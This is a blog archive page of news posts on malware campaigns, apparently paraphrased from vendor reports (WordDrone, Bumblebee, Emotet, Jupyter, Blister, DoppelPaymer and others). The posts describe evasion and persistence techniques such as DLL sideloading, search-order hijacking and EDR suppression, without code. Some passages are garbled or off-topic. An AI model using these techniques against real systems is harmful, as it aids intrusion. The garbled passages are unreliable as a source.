Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label DLL. Show all posts

New Malware 'WordDrone' Targets Taiwan's Drone Industry

 



Reported by: Acronis (TRU) just published a comprehensive investigation that reveals a highly sophisticated malware operation targeting Taiwan's growing drone industry. Dubbed "WordDrone," the malware deploys a version of Microsoft Word from the 1990s to install a persistent backdoor-the kind of threat that puts the security of companies in Taiwan's growing drone industry in real jeopardy. At this stage, one suspects that strategic military and technological positions of Taiwan provide the rationale behind this breach designed to extract critical information. It is during times when investments by the government in drone technology are accelerating.


How WordDrone Operates

A new malware uses the side-loading technique by which it involves a vulnerable version of Microsoft Word 2010. Using a compromised version of Word, attackers loaded three files on the target system: a legitimate copy of the Microsoft Word application, known as winword, a malicious DLL file named wwlib.dll, and an encrypted additional file with a random name.

Then, an unconscious download of the malicious DLL by running the benign Microsoft Word file becomes a delivery method to decrypt and run the real payload of malware. This technique is the exploitation of the weakness within how older versions of Microsoft Word treat DLL files: the malicious DLL can actually masquerade as part of Microsoft Office. Such an approach will make WordDrone virtually impossible for any traditional security tool to detect and block since the files that are infected look legitimate to most detection systems.


Detection Evasion Advanced Tactics

Moreover, many of the malicious DLL files are digitally signed using highly recently expired certificates. This kind of approach, a disguise for legitimacy, many security systems employ to verify software, makes detection much more difficult. This strategy gives WordDrone an advantage bypassing defences based on trusting signed binaries, which makes it rather difficult to detect.

After running it, the threat performs a stage of well-crafted operations. The payload begins with a shellcode stub that unpacks and injects an "install.dll" component creating persistence on the affected system. The install.dll file allows malware to be present even after reboots by various techniques: it can install malware as a background service, schedule it as a recurring task, or inject the next phase of malware execution, and does not need permanent installation.


Persistence and Defense Evasion Techniques

It applies advanced techniques in a way that it stays non-observable and keeps running. Its techniques begin with NTDLL unhooking, which disables the setting of security hooks by monitoring software and re-loads a fresh instance of the NTDLL library so that security tools cannot intervene with that. In addition to that, it keeps the EDR quiet. This scan for active security processes sets up blocking rules within Windows Firewall to dampen the functions of identified security tools, effectively disabling detection capabilities that may raise defences against its presence.


Command-and-Control (C2) Communication for Remote Control

Another advanced feature about WordDrone is the ability to communicate with a C2 server, meaning the attackers can control the malware even after it is installed. The communication schedule is hardcoded within the malware by implementing a bit array that states some active hours in a week. The malware requests from the C2 server additional details or more malicious files during active hours based on such a routine.

WordDrone can function over several communication protocols including TCP, TLS, HTTP, HTTPS, and WebSocket, which all make identification and analysis much more difficult of the malware's network activities. Its use of a custom binary format for its communication makes it even more challenging to intercept or to interpret its network traffic for cybersecurity teams.


Possible Supply Chain Attack and Initial Infection Vector

The entry point of the WordDrone malware is not clear. Initial analysis, however, showed malicious files under a well-known Taiwanese ERP software's folder. That makes it likely that the attackers have also compromised the ERP software as part of a supply chain attack, possibly exposing other organisations that make use of the software in different marketplaces.

The attack by WordDrone on the Taiwanese drone industry is an example of vulnerabilities that sectors of strategic importance have to face. Ongoing vigilance from cybersecurity experts gives caution, as defence and technology-related organisations try to win the technological battle with such persistent threats.


Google Delivers Bumblebee Malware

 


A malware campaign has recently been detected that uses Google ads and SEO poisoning to spread malware. The malware that attacks corporate users is dubbed Bumblebee. It was discovered that Bumblebee, a malware targeted at enterprise users, is distributed via marketing channels like Google Adwords and SEO poisoning that promote popular software applications such as Zoom, Cisco AnyConnect, ChatGPT, and Citrix Workspace. BazarLoader's backdoor is intended to be replaced by this malware. 

A tool called BazarLoader assists users in connecting to networks and gaining access to them. Several leading security organizations have stated that it is often the cause of ransomware attacks. 

It is a constant challenge to stay ahead of the new threats that emerge in cybersecurity regularly. BumbleBee malware is used by ransomware gangs as a tool to gain initial access to networks and carry out attacks. An attempt was made by the Conti team to replace the BazarLoader backdoor with this malware, which was discovered in April 2022, but the backdoor has since been removed. 

There was a recent discovery of a dangerous version of BumbleBee malware. As part of the attack chain, PowerSploit was used to inject reflective DLLs into memory, which was a sneaky and dangerous technique. By doing this, existing antivirus products are not able to detect malware when it is loaded into memory, which makes detection and prevention harder, resulting in malware being able to stay undetected.

A malicious program often comes packaged as an ISO file, which contains a DLL that has a custom loader inside it, bundled inside an ISO file. The malware was dubbed BUMBLEBEE due to its proprietary user agent "Bumblebee," resulting in its unique name. BumbleBee was observed fetching Cobalt Strike Payloads at the time of analysis by Google's Threat Analysis Group (TAG). 

In an ongoing campaign found by Secureworks, researchers there have discovered trojanized versions of popular apps that are being distributed through Google ads to unsuspecting victims who are being infected with the BumbleBee malicious software. These advertisements advertise Zoom, Cisco AnyConnect, ChatGPT, and Citrix Workspace. Using bogus downloads pages, they prompt users to download a Trojanized version of the software after redirecting them to a bogus download page on the internet. 

Google Ads Distribute Malware

In addition, the researchers discovered that a Google advertisement campaign would be used for an upcoming campaign. It has become common practice to use Trojanized versions of popular apps to promote malware loaders to unsuspecting victims through these advertisements. This campaign consisted of a Google advertisement promoting a fake Cisco AnyConnect Secure Mobility Client download page that was marketed by a Google advertisement. 

The page was created on February 16, 2023, under an "appcisco[.]com" domain and hosted on that server. Through this malicious advertisement on Google, the user was taken to an incorrect download page accessed via a compromised WordPress site. There was a fake landing page on the web that promoted an MSI installer that was entitled “cisco-anyconnect-4_9_0195.msi” that installs the malware BumbleBee. 

It is imperative to recognize the risks posed by such campaigns and take appropriate measures to secure the systems and networks affected by them. To detect and prevent such attacks, companies must ensure robust security measures are in place. You must remain vigilant and trained in cybersecurity best practices to protect yourself against these sophisticated attacks.

A cyberattack on Eurocontrol, the European air traffic control organization, did not end at the end of the weekend, as the effects continued until today. According to a report in the Wall Street Journal, the disruptions caused by Russia's KillNet networks did not disrupt flights.      

FancyBear: Hackers Use PowerPoint Files to Deliver Malware

 

FancyBear: Hackers Use PowerPoint Files to Deliver Malware Cluster25 researchers have recently detected a threat group, APT28, also known as FancyBear, and attributed it to the Russian GRU (Main Intelligence Directorate of the Russian General Staff). The group has used a new code execution technique that uses mouse movement in Microsoft PowerPoint, to deliver Graphite malware.
 
According to the researchers, the threat campaign has been actively targeting organizations and individuals in the defense and government organizations of the European Union and East European countries. The cyber espionage campaign is believed to be still active.
 

Methodology of Threat Actor

 
The threat actor allegedly entices victims with a PowerPoint file claiming to be associated with the Organization for Economic Cooperation (OECD).
 
This file includes two slides, with instructions in English and French to access the translation feature in zoom. Additionally, it incorporates a hyperlink that plays a trigger for delivering a malicious PowerShell script that downloads a JPEG image carrying an encrypted DLL file.
 
The resulting payload, Graphite malware is in Portable Executable (PE) form, which allows the malware operator to load other malwares into the system memory.
 
“The code execution runs a PowerShell script that downloads and executes a dropper from OneDrive. The latter downloads a payload that extracts and injects in itself a new PE (Portable Executable) file, that the analysis showed to be a variant of a malware family known as Graphite, that uses the Microsoft Graph API and OneDrive for C&C communications.” States Cluster25, in its published analysis.
 
The aforementioned Graphite malware is a fileless malware that is deployed in-memory only and is used by malware operators to deliver post-exploitation frameworks like Empire. Graphite malware’s purpose is to allow the attacker to deploy other malwares into the system memory.
 
 
Based on the discovered metadata, according to Cluster25, the hackers have been preparing for the cyber campaign between January and February. However, the URLs used in the attacks were active in August and September.
 
With more hacker groups attempting to carry out such malicious cyber campaigns, the government and private sectors must deploy more powerful solutions to prevent future breaches and cyber attacks to safeguard their organizations.

Clipminer Botnet Made 1.7 Million Dollars From Crypto Mining

 

Threat researchers have found a large-scale operation of Clipminer, a new cryptocurrency mining virus that netted its users at least $1.7 million in transaction hijacking.

Clipminer is built on the KryptoCibule malware, according to researchers at Symantec, a Broadcom company. Both trojans are designed to steal bitcoin wallets, hijack transactions, and mine cryptocurrency on affected computers. 

Clipminer is based on the KryptoCibule malware, according to researchers at Symantec, a Broadcom company. Both trojans are designed to steal bitcoin wallets, hijack transactions, and harvest cryptocurrency on affected computers. Researchers were taken aback by the new malware because it had fast grown in size by the time it was discovered. According to the Symantec team, these operations involved 4375 bitcoin wallet addresses that received stolen monies from victims.

Downloads or pirated software, are used to spread malware; malicious clipminer botnet files are distributed over torrent sites and other pirating methods. This bitcoin miner can be installed on the machine as a WinRAR archive, which will immediately start the extraction process and launch the control panel file, leading to the download of the dynamic link library. 

The infected DLL creates registry values and installs malware in several files in the Windows directory. Those files are named after ransoms so that the profile may be hosted and the main miner's payload can be downloaded and installed afterward. The system receives identification, which is sent on to the C&C server, which then sends out a request for the payload. The malware is delivered as a 10MB file in the Program Files directory. Once the trojan has been successfully executed, scheduled actions are set up to ensure the malware's persistence. To avoid re-infecting the same host, registry modification is also performed.

According to Symantec, the first Clipminer samples began to circulate in January 2021, with malicious activity picking up in February. Ever since the malware has spread over P2P networks, torrent indexers, YouTube videos, and through game and pirated software cracks. To avoid becoming infected with Clipminer or other malware, avoid downloading software from unknown sources. Verify the entered cryptocurrency wallet address before initiating the transaction to protect yourself from a clipboard hijacker.

Iranian Hackers Launch Cyberattack Against US and the UK 

 

Secureworks, a cybersecurity firm, has detected a new attack attributed to the Iranian hacker organization known as APT34 or Oilrig, which utilized custom-crafted tools to target a Jordanian diplomat. APT35, Magic Hound, NewsBeef, Newscaster, Phosphorus, and TA453 are advanced persistent threat (APT) actors known for targeting activists, government organizations, journalists, and other entities. 

A ransomware gang with an Iranian operational connection has been linked to a succession of file-encrypting malware operations targeting institutions in Israel, the United States, Europe, and Australia.

"Elements of Cobalt Mirage activities have been reported as Phosphorus and TunnelVision," Secureworks, which tracks the cyberespionage group, said today. "The group appears to have switched to financially motivated attacks, including the deployment of ransomware." 

The threat actor used recently obtained access to breach the network of a nonprofit organization in the United States in January 2022, where they built a web shell which was then used to drop further files, according to the researchers. 

The threat actor has seemingly carried out two types of intrusions, one of which involves opportunistic ransomware assaults using genuine tools like BitLocker and DiskCryptor for financial benefit. The second round of attacks is more focused, with the primary purpose of securing access and acquiring intelligence, with some ransomware thrown in for good measure.

Initial access routes are enabled by scanning internet-facing servers for web shells and exploiting them as a route to move laterally and activate the ransomware, which is vulnerable to widely reported holes in Fortinet appliances and Microsoft Exchange Servers. 

The spear-phishing email, which Fortinet discovered, was sent to a Jordanian diplomat and pretended to be from a government colleague, with the email address faked accordingly. The email included a malicious Excel attachment with VBA macro code that creates three files: a malicious binary, a configuration file, and a verified and clean DLL. The macro also adds a scheduled job that runs every four hours to provide the malicious application (update.exe) persistence. 

Another unique discovery concerns two anti-analysis methods used in the macro: the manipulating of sheet visibility in the spreadsheet and a check for the presence of a mouse, both of which may not be available on malware analysis sandbox services.

Secureworks detailed a January 2022 attack on an undisclosed US charity organization but said the exact means by which full volume encryption capability is triggered is unknown. In mid-March 2022, another attack aimed at a US local government network is thought to have used Log4Shell holes in the target's VMware Horizon architecture to perform reconnaissance and network scanning tasks. 

While the group has managed to breach a huge number of targets around the world, the security researchers believe that "their capacity to leverage on that access for financial gain or information collection is limited." Secureworks determines that the group's use of publicly available tools for ransomware activities proves that it is still a threat.

Emotet is Evolving with Different Delivery Methods

 

Emotet is a well-known botnet and trojan which distributes follow-on malware via Windows platforms.  After a 10-month pause amid a coordinated law enforcement operation to take down its assault infrastructure, Emotet, the work of a cybercrime organization known as TA542 (formerly known as Mummy Spider or Gold Crestwood), marked its comeback late last year. 

Since then, Emotet campaigns have sent tens of thousands of messages to thousands of clients across many geographic regions, with message volumes exceeding one million in some situations. The threat actor behind the popular Emotet botnet is experimenting with new attack methods on a small scale before incorporating them into larger-scale spam campaigns, possibly in response to Microsoft's decision to deactivate Visual Basic for Applications (VBA) macros by default across all of its products.

According to analysts, the malicious actors behind Emotet, TA542, are experimenting with new approaches on a micro level before deploying them on a larger scale. The current wave of attacks is claimed to have occurred between April 4 and April 19, 2022, when prior large-scale Emotet campaigns were halted. 

Researchers from Proofpoint discovered numerous distinguishing characteristics in the campaign, including the usage of OneDrive URLs rather than Emotet's traditional dependence on Microsoft Office attachments or URLs connecting to Office files. Instead of Emotet's previous use of Microsoft Excel or Word documents with VBA or XL4 macros, the campaign employed XLL files, which are a sort of dynamic link library (DLL) file designed to expand the capability of Excel.

Alternatively, these additional TTPs could mean the TA542 is now conducting more targeted and limited-scale attacks in addition to the traditional mass-scale email operations. The lack of macro-enabled Microsoft Excel or Word document attachments is a notable departure from prior Emotet attacks, implying the threat actor is abandoning the tactic to avoid Microsoft's intentions to disable VBA macros by default beginning April 2022. 

The development came after the virus writers addressed an issue last week which prevented potential victims from being compromised when they opened weaponized email attachments.

The Wizard of Deception: Jupyter Infostealer

 

Researchers recently discovered a new variant of SolarMarker, a malware family which is mostly transmitted using SEO manipulation to persuade people into downloading malicious documents. SolarMarker uses defense evasion to extract auto-fill data, saved passwords, and stored credit card information from victims' web browsers. It offers extra features which are unusual to be seen in info stealers, such as file transfer and command execution from a C2 server.

Jupyter packaged itself with legal executables when it was first detected towards the end of 2020. When it was run, it revealed a PowerShell script that had been obfuscated. The threat group is improving layers of stealth and obfuscation, such as loading the Jupyter Dynamic-Link Library (.DLL) into memory rather than writing the file to disk. Now, it is frequently packaged in massive Windows® installer packages (.MSI) which can reach 100 MB in size. 

To further conceal its motives, these packages are still integrated with legitimate software and signed with valid digital certificates. The installer will load and seek to install the bundled genuine application after installation. However, buried deep within the Trojan installer's code is a small, extensively obfuscated, and encrypted PowerShell script which runs in the background. 

Jupyter has masked itself as a variety of programs and installers. The malware's main file extension has been changed to.MSI, and it executes its obfuscated PowerShell script via several techniques. Jupyter is usually hosted on phony downloading websites which pose as real hosts. These websites typically offer a free PDF book. These can be accessed accidently by a victim or via a link in a spam email. 

It is often packaged with freeware software and certified with unrevoked digital certificates, making the installation appear more authentic. When the Windows installer package is loaded, it will present an installer pop-up for the targeted legitimate application, while loading data and running in the background. 

Jupyter has deployed itself in a variety of ways in the past campaign. The malware usually has two primary files: 
  • An executable and a Windows PowerShell script that contains the harmful code.
  • Some Jupyter variants have also dumped a temporary file (.TMP) into the victim’s %AppData%\Roaming\Temp\ directory, to construct the normal content of Jupyter's main malicious PowerShell script. 

PowerShell is used by the virus to conceal and execute its harmful code without ever publishing itself to disk on the victim's PC. It avoids writing to disk by loading Jupyter's DLL into memory reflectively. DLLs are usually injected into a process from a file written to a disk. 

Reflective DLL injection is a technique for injecting code into a victim process directly from memory rather than from disk. Because the fully un-obfuscated malware does not live on disk, it necessitates the creation of a persistence mechanism, such as registry keys that reload the malware when the victim machine boots up. As a result, Jupyter DLL is difficult to both identify and use. 

Jupyter's basic PowerShell may be split down into six different phases or components. Each phase aids in the achievement of a given objective, function, or capability. Though many Jupyter samples follow the same procedures, differences in Jupyter's PowerShell code exist, and certain samples have been observed to work in slightly different methods to achieve the same goals. 

One can make a modest tweak to the attacker's PowerShell script to save the assembly to disk instead of loading it into memory. This will also assist us in comprehending the operation of this version of SolarMarker. One can see the decompiled code, as well as the names of the classes and functions, are incorrect. Instead, they appear to be obfuscated. 

The SolarMarker backdoor is a.NET C2 client which uses an encrypted channel to interact with the C2 server. HTTP is used for communication, with POST requests being the most common. The data is secured with RSA encryption and symmetric encryption using the Advanced Encryption Standard (AES). Internal reconnaissance is carried out by the client, who gathers basic information about the victim's system and exfiltrates it through an existing C2 channel. The infostealer module has a structure that is quite identical to the backdoor module we discussed earlier, but it has more features.

By reading files relevant to the target browser, the SolarMarker infostealer module obtains login data, cookies, and web data (auto-fill) from web browsers. To decrypt the credentials, SolarMarker uses the API method CryptUnprotectData (DPAPI). 

The usefulness of behavior-based detectors in reducing the stay time of threats inside a network has been recognized by the security industry in recent years. 

Hackers are Now Utilizing Office Documents to Launch the Regsvr32 Utility

 

Regsvr32, a Windows living-off-the-land binary (LOLBin) used to propagate trojans like Lokibot and Qbot, is seeing a surge in abuse recently, according to researchers. 

LOLBins are genuine, native utilities which are used on a regular basis in a variety of computing settings, yet are utilized by cybercriminals to avoid detection by merging in with typical traffic patterns. Regsvr32 is a Windows command-line program signed by Microsoft which lets users register and unregister DLLs (Dynamic Link Library). Information about a DLL file is uploaded to the centralized registry so the Windows may use it. 

This makes things simpler for other programs to take advantage of the DLLs' features. This broad reach is appealing to cybercriminals, who may exploit the utility through Squiblydoo, which has been a utilized malware by known APT groups, such as in spear-fishing efforts against Russian firms, and more recently in certain crypto mining events. 

Unlawful utilization of Regsvr32 has been on the rise recently in the Uptycs data, with cybercrooks attempting to register specifically. As a group, we. ActiveX controls are code blocks designed by Microsoft that allow applications to perform specified functions, such as showing a calendar, using OCX files. 

Uptycs EDR employs a multi-layered detection strategy that not only analyzes threats using the Squiblydoo technique but also prioritizes them according to a specific composite score and severity. This helps analysts focus on key situations first, reducing alert fatigue. 

The majority of such Microsoft Excel files found in the attacks have the.XLSM or.XLSB prefixes, which indicate files contain embedded macros. Using the formulas in the macros, hackers normally download or operate a malicious payload from the URL during the campaign. 

Conventional security systems and security personnel tracking this operation for malicious actions face a problem because regsvr32 is frequently utilized for regular daily tasks. The following aspects can be monitored by security teams: 

  • The parent/child program relations where regsvr32 is run alongside a Microsoft Word or Excel parent process. 
  • Locating  regsvr32.exe operations that load the scrobj.dll, which performs the COM scriptlet, to identify it.

BATLOADER and Atera Agent are Being Distributed Through an SEO Poisoning Campaign

 

A new SEO poisoning campaign is underway, with the purpose of infecting targeted systems with the BATLOADER and Atera Agent malware. It appears to be aimed at professionals looking to download productivity applications such as TeamViewer, Zoom, or Visual Studio. SEO poisoning is a tactic used by hackers in cyberattacks to build up malicious websites loaded with certain keywords that visitors typically seek up in search engines. Then they use various SEO (Search Engine Optimization) techniques to make these appear prominently in search results. 

According to a report by Mandiant researchers, in this malicious SEO campaign, threat actors attack legitimate websites in order to plant compromised files or URLs. Users are thus routed to websites that host malware posing as well-known applications. 

“The threat actor used “free productivity apps installation” or “free software development tools installation” themes as SEO keywords to lure victims to a compromised website and to download a malicious installer. The installer contains legitimate software bundled with the BATLOADER malware. The BATLOADER malware is dropped and executed during the software installation process.” said the researchers. 

“This initial BATLOADER compromise was the beginning of a multi-stage infection chain that provides the attackers with a foothold inside the target organization. Every stage was prepared for the next phase of the attack chain. And legitimate tools such as PowerShell, Msiexec.exe, and Mshta.exe allow proxy execution of malicious payloads to avoid detection,” they added. 

A file called "AppResolver.dll" was discovered in the attack chain as a significant sample. This DLL sample is an internal component of Microsoft's Windows Operating System, but it contains malicious VBScript inserted in such a way that the code signature stays valid. When run on its own, the DLL sample does not execute the VBScript. When ran with Mshta.exe, Mshta.exe locates and executes the VBScript without error. 

This vulnerability is similar to CVE-2020-1599 in that the PE Authenticode signature remains valid after appending HTA compatible scripts signed by any software developer. These PE+HTA polyglot (.hta files) can be used by Mshta.exe to circumvent security solutions that rely on Microsoft Windows code signing to determine whether or not files are trusted. 

In this case, researchers discovered that arbitrary script data was attached to the signature section of a legitimately signed Windows PE file at the end of the ASN.1. As long as the file extension is not '.hta,' the resulting polyglot file retains a valid signature. If this polyglot file is executed with Mshta.exe, the script contents will be successfully executed since Mshta.exe will skip the PE's bytes, locate the script at the end, and execute it.

Blister Malware Silently Slips Through Windows Defences

 

Cybersecurity researchers have revealed details of an evasive malware campaign that uses valid code signing certificates to bypass security defences and remain undetected, with the purpose of distributing Cobalt Strike and BitRAT payloads on infected systems. Elastic Security researchers dubbed the binary, a loader, "Blister," and the malware samples had negligible to zero detections on VirusTotal. The infection vector utilized to stage the attack, as well as the eventual goals of the infiltration, are unknown. 

A notable aspect of the attacks is that they make use of a legitimate Sectigo code signing certificate. The malware has been seen signed with the certificate in question since September 15, 2021. Elastic stated that it has contacted the company in order to get the exploited certificates revoked. "Executables with valid code signing certificates are often scrutinized to a lesser degree than unsigned executables," researchers Joe Desimone and Samir Bousseaden said. "Their use allows attackers to remain under the radar and evade detection for a longer period of time." 

Another intriguing component of this campaign is what looks to be a novel malware loader with few VirusTotal detections. It's known as the BLISTER loader. The loader is likely spliced into genuine libraries like colorui.dll to guarantee that the majority of the on-disk footprint contains known-good code and metadata. The loader can be written to disc from simple dropper executables at first. One such dropper saves a signed BLISTER loader to %temp%\Framwork\axsssig.dll and runs it with rundll32. BLISTER's LaunchColorCpl is a popular DLL export and entry point name. 

BLISTER uses a basic 4-byte XOR routine to decode bootstrapping code stored in the resource area when it is run. The bootstrapping code is extensively obfuscated and sleeps for 10 minutes at first. This is almost certainly an attempt to avoid sandbox analysis. It decrypts the embedded malware payload after the delay. CobaltStrike and BitRat have been identified as embedded malware payloads by researchers. When the embedded payload is decoded, it is either loaded into the current process or injected into a newly generated WerFault.exe process.

Elastic Security has alerted Sectigo that Blister's code signing certificate has been revoked; nonetheless, the company has also produced a Yara rule to assist organizations in identifying the new malware.

DoppelPaymer Searches for and Terminates Windows Processes

 

Crowdstrike Intelligence claimed in a July 2019 blog post on DoppelPaymer that ProcessHacker was being hijacked to terminate a list of targeted processes and obtain access, providing a "critical hit." DoppelPaymer is a descendant of the BitPaymer ransomware and a member of the Dridex malware family. It's presently being delivered in a variety of ways, including phishing or spam emails with attachments containing malicious code - either JavaScript or VBScript. 

DoppelPaymer places the ProcessHacker executable, the KProcessHacker driver, and the malicious stager DLL under a subdirectory of %APPDATA% to start ProcessHacker. The subdirectory name, as well as the executable and driver file names, are all a unique string of alphanumeric characters. Following the creation of those two files, one of the DLLs loaded by ProcessHacker must be hijacked using a technique known as "DLL search order hijacking."

DoppelPaymer sends the ProcessHacker process two arguments: the name of the KProcessHacker.sys driver and an integer that will be used for inter-process communication (IPC) between the DoppelPaymer and ProcessHacker processes.

DoppelPaymer, like Dridex, exploits DLL search order hijacking to exploit the DLL loading behavior of Windows programs. When the operating system PE loader loads a binary, it must also load the DLL files needed for the PE to function. When seeking for DLL files to load, MS Windows takes a certain path by default. Before checking the Windows system directories, Windows looks for Windows system DLLs in the same directory as the target program. In this situation, DoppelPaymer, a malicious process, can drop a malicious version of a DLL in that directory, which will be loaded by the target application. 

DoppelPaymer searches the module name list in the ProcessHacker binary's Import Address Table (IAT) to decide which DLL to hijack. Each name is hashed using the CRC32 algorithm and compared to a hardcoded list of hashes, if a match is found, the name is added to a list data structure. To select one of the three names from the list, a random number generator is employed. 

After selecting a DLL, the authentic Windows version of the DLL is read into a memory buffer. This DLL serves as a template for creating the malicious stager DLL. The file is saved in the same folder as the ProcessHacker executable and has the same name as the hijacked DLL.

BazarLoader's Arrival and Delivery Vectors now Include Compromised Installers and ISO

 

While the number of BazarLoader detections increased in the third quarter, two new delivery methods have been added to the list of delivery mechanisms used by threat actors for data theft and ransomware. Malicious actors combine BazarLoader with genuine products, hence one of the approaches involves using corrupted software installers. The second approach involves loading a Windows link (LNK) and dynamic link library (DLL) payload into an ISO file. The Americans have been discovered to have the highest amount of BazarLoader attacks.

Researchers detected the tainted versions of VLC and TeamViewer software included with BazarLoader, according to reports. While the original delivery technique has yet to be discovered, it's possible that the use of these packages is part of a bigger social engineering campaign aimed at convincing individuals to download and install infected installers. A BazarLoader executable is dumped and executed when the installers load. It's also one of the most noticeable differences from recent BazarLoader arrival approaches, which appeared to support dynamic link libraries (DLL).

Meanwhile, a distribution technique based on ISO files has been uncovered, in which the BazarLoader DLL is launched via DLL and LNK files included in the ISO files. The LNK file uses a folder icon to fool the user into double-clicking it, letting the BazarLoader DLL programme to be launched. The "EnterDLL" export function, which was recently used by BazarLoader, is then called. Before injecting itself into a suspended MS Edge process, Rundll32.exe launches the malicious DLL and connects to the C&C server. 

As threat actors change their assault techniques to avoid detection, the number of arrival mechanism modifications utilized in BazarLoader campaigns continues to rise. Due to the limitations of single detection methods, both techniques are significant and still work despite their lack of novelty. 

While the usage of compromised installers has been seen with other malware, the huge file size might still pose a problem for detection systems, such as sandboxes, that apply file size constraints. LNK files used as shortcuts, on the other hand, will very certainly be obfuscated due to the additional layers generated between the shortcut and the malicious files. 

BazarLoader will continue to evolve as a standalone information stealer, an initial access malware-as-a-service (MaaS) for other malware operators, and a secondary payload distribution mechanism for even more destructive attacks like modern ransomware. For unknown risks, security teams must deploy multi-layered systems capable of pattern recognition and behavior monitoring, as well as making monitoring and tracking for known dangers more evident based on known data.

Years-Long Attack by Chinese-Linked APT Groups Discovered by McAfee

 

A cyber-attack that had been sitting on the target organization's network for years stealing data was discovered during a McAfee investigation into a suspected malware infection. The sophisticated threat actors utilized a mix of known and novel malware tools in the attack, called Operation Harvest, to infiltrate the victim's IT infrastructure, exfiltrate data, and avoid detection, according to the investigators. McAfee researchers were able to narrow down the list of suspects to two advanced persistent threat (APT) nation-state groups with ties to China during the course of the two-month investigation. 

“Operation Harvest has been a long-term operation whereby an adversary maintained access for multiple years to exfiltrate data,” Christiaan Beek, lead scientist and senior principal engineer for the Enterprise Office of the CTO at McAfee, wrote in a report. 

“The exfiltrated data would have either been part of an intellectual property theft for economic purposes and/or would have provided insights that would be beneficial in case of military interventions. The adversaries made use of techniques very often observed in this kind of attack but also used distinctive new backdoors or variants of existing malware families,” Beek added. 

The actor gained initial access by compromising the victim's web server, which contained software to maintain the existence and storage of tools needed to acquire information about the victim's network and lateral movement/execution of files, according to forensic investigations. 

Between the operating method of the unique encryption function in the custom backdoor and the code used in the DLL, the adversaries used techniques that are commonly seen in this type of attack, but they also used distinctive new backdoors or variants of existing malware families, almost identical to methods attributed to the Winnti malware family. According to the findings, the adversary was looking to steal proprietary knowledge for military or intellectual property/manufacturing reasons.

McAfee investigators drew out MITRE ATT&CK Enterprise methods, added the tools utilized, and compared the information to previous technique data to figure out who the perpetrators were. They discovered four groups that shared the same tactics and sub-techniques and then used a chart to narrow down the suspects to APT27 and APT41.

“After mapping out all data, TTP’s [tactics, techniques, and procedures] etc., we discovered a very strong overlap with a campaign observed in 2019/2020,” Beek wrote. “A lot of the (in-depth) technical indicators and techniques match. Also putting it into perspective, and over time, it demonstrates the adversary is adapting skills and evolving the tools and techniques being used.”

PRIVATELOG Relies on Common Log File System to Evade Detection

 

Researchers have revealed data about a new malware family that uses the Common Log File System (CLFS) to conceal a second-stage payload in registry transaction files in order to avoid detection. The malware, named PRIVATELOG, and its installer, STASHLOG, were discovered by FireEye's Mandiant Advanced Practices team. Details about the threat actor's identity and motivations are still unknown. 

CLFS (Common Log File System) is a general-purpose logging subsystem for producing high-performance transaction logs that is available to both kernel-mode and user-mode applications. It debuted with Windows Server 2003 R2 and has since been incorporated into subsequent Windows operating systems. CLFS can be used for event logging as well as data logging. TxF and TxR employ CLFS to save transactional state changes before committing a transaction. Any integrated Windows utility will not be able to examine the Binary Log File(s) created by CLFS. 

CLFS's goal, like that of any other transactional logging system, is to record a series of steps required for a particular activity so that they can be accurately replayed in the future to commit the transaction to secondary storage or undone if necessary.

Despite the fact that the malware has yet to be found in real-world attacks aimed at consumer environments or seen launching any second-stage payloads, Mandiant believes PRIVATELOG is still in development, might be the work of a researcher, or could be used in a highly targeted attack. 

“Because the file format is not widely used or documented, there are no available tools that can parse CLFS log files. This provides attackers with an opportunity to hide their data as log records in a convenient way, because these are accessible through API functions. This is similar in nature to malware which may rely, for example, on the Windows Registry or NTFS Extended Attributes to hide their data, which also provide locations to store and retrieve binary data with the Windows API.” explained Mandiant researchers.

PRIVATELOG and STASHLOG have features that allow malicious software to remain undetected on infected machines, such as the use of obfuscated strings and control flow techniques that are specifically designed to make static analysis difficult. 

Mandiant researchers examined a PRIVATELOG sample that is an un-obfuscated 64-bit DLL named prntvpt.dll that contains exports that are similar to those found in legal prntvpt.dll files. By hijacking the search order used to load DLLs, PRIVATELOG expects to be loaded from PrintConfig.dll. YARA rules are provided by Mandiant to detect PRIVATELOG and STASHLOG malware, as well as it's variations.

IISerpent Trojan Manipulates Search Engine Optimization

 

Security researchers recently had to cope with a huge number of malware attacks targeting the Internet Information Services (IIS) component. The IISerpent Trojan is the most recent malware family to be added to the list. 

The malware is installed as a Microsoft IIS add-on. After that, it intercepts HTTP requests and traffic, but there's a catch. This IIS malware works differently than other IIS malware that leverages this opportunity to steal credentials and private data, such as the IISpy Backdoor. It only gets to work if it recognizes requests to specific search engines, rather than ordinary HTTP traffic. Search engines have crawlers that scour the Web for pages to index or re-index on a regular basis. It is possible for pages on the same domain to link to one another. Crawlers utilize specific algorithms to determine a page's search engine ranking. 

Buying adverts or implementing search engine optimization (SEO) strategies are two valid ways to improve page ranking in search engine result pages, however not all digital marketers follow the laws. SEO-boosting practices (which, however, contravene webmaster guidelines) such as loading pages with unrelated keywords or buying backlinks to improve a website's reputation are referred to as unethical SEO (historically known as black hat SEO).

IISerpent is a native IIS module, implemented as a C++ DLL and configured in the %windir%\system32\inetsrv\config\ApplicationHost.config file. IISerpent ensures both persistence and execution because all IIS modules are loaded by the IIS Worker Processes (w3wp.exe) and used to handle inbound HTTP requests.

IISerpent exports a function called RegisterModule, which provides module initialization, just like all native IIS modules. Its event handlers — methods of the module class (inherited from CHttpModule) that are called on certain server events – hide the underlying harmful functionality. IISerpent's code class alters the IIS server's OnBeginRequest and OnSendResponse methods, causing the malware's handlers to be called every time the IIS server begins processing a new inbound HTTP request and transmits the response buffer. 

Because everything appears normal to the webmaster and users - all the 'magic' happens in the background – these assaults are extremely difficult to detect. Of course, a short glance at a backlink analysis or network traffic data will suggest that something is amiss. 

The worst thing about the IISerpent Trojan's attack is that the websites that are attacked could lose their good SEO ranking. This is possible because search engine crawlers will quickly notice the link between the original page and the counterfeit website, which will usually result in SEO penalties.

International Law Enforcement Takes Down Emotet Malware in a Joint Operation

 

Emotet, one of the most dangerous email spam botnets in recent history, is being wiped out today from all infected devices with the help of a malware module delivered in January by law enforcement. The botnet's takedown is the result of an international law enforcement action that allowed investigators to take control of the Emotet's servers and disrupt the malware's operation. 

This specifically designed malware code forced the Emotet to self-destruct on Sunday, April 25. The code was distributed at the end of January to Emotet-infected computers by the malware's command-and-control (C2) infrastructure, which had just been seized in an international law enforcement operation.

After the takedown operation, law enforcement pushed a new configuration to active Emotet infections so that the malware would begin to use command and control servers controlled by the Bundeskriminalamt, Germany's federal police agency. Law enforcement then distributed a new Emotet module in the form of a 32-bit EmotetLoader.dll to all infected systems that automatically uninstalled the malware on Sunday.

